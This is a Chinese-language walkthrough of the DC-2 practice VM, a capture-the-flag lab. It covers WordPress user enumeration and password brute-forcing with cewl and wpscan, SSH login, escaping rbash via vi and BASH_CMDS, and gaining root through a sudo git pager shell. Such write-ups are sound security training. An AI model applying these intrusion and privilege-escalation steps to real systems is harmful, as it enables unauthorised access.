1.官网下载

 

任务目标:拿到4个flag.txt文件

2.使用vbox虚拟机导入

 

3.使用kali进行扫描

arp-scan -l 查看内网网段arp的映射ip

 

4.扫描出80端口进行访问发现页面302

 

直接访问发现永久302所以我们先在kali的host解析文件中添加目标的ip

vim /etc/hosts

添加192.168.0.104 dc-2

 

可以发现网站是wordpress,查看flag发现flag1

 

访问之后发现flag1,提示让我们使用cewl工具生成字典

cewl dc-2 > pwd.txt(生成密码字典)

 

会在目录下生成一个pwd.txt文件

 

我们使用wpscan扫描这个网站

wpsacn --url url地址

wpscan --url url地址 -e u(枚举用户名)

 

发现有三个账户,我们一个个尝试一下爆破

wpscan --url url地址 -U username -P pwd.txt(尝试爆破用户名和密码)

admin没有爆破出来

 

尝试一下jerry,发现密码是adipiscing

 

再爆破一下tom,密码是parturient

 

我们拿到爆破得到的用户名和密码进行登录后台看看

登录之后发现flag2

 

 

后台没有什么上传的地方,wordpress没有插件漏洞后台是比较难拿shell的,版本发现是5.7.1的

我们把拿到的账号和密码尝试使用ssh登录发现tom是可以登录ssh的

jerry登录失败

 

ssh -p 7744 tom@192.168.0.101(ssh登录)

 

连接之后发现flag3.txt,查看shell当前状态发现是rbash(受限制的bash环境)

 

whoami都无法正常执行使用echo /home/tom/usr/bin/*查看可以执行的命令

 

发现该用户可以执行的命令只有这些,发现vi可以使用,使用vi编辑器突破rbash

vi

:set shell=/bin/sh

:shell(进入sh命令行)

 

之后使用export PATH=/usr/bin:/usr/sbin:/bin:/sbin即可

 

第二种方法突破rbash环境

BASH_CMDS[a]=/bin/sh;a(将sh赋值给a)

/bin/bash(进入bash命令行)

export PATH=$PATH:/bin/(导出路径)

export PATH=$PATH:/usr/bin/即可

 

查看flag发现要我们切换到jerry账户

 

使用之前爆破的密码登录

 

查看是否有可以提权的命令

 

发现没有可以利用的命令,也没有发现可以读写的文件

 

再使用sudo -l查看一下有没有可以利用的命令

 

发现git是可以利用的

使用sudo git help config进入文本模式

!/bin/bash即可进入root的shell

 

 

进入root权限之后发现flag4.txt

 

进入根目录发现最总的flag

 

 

到此渗透结束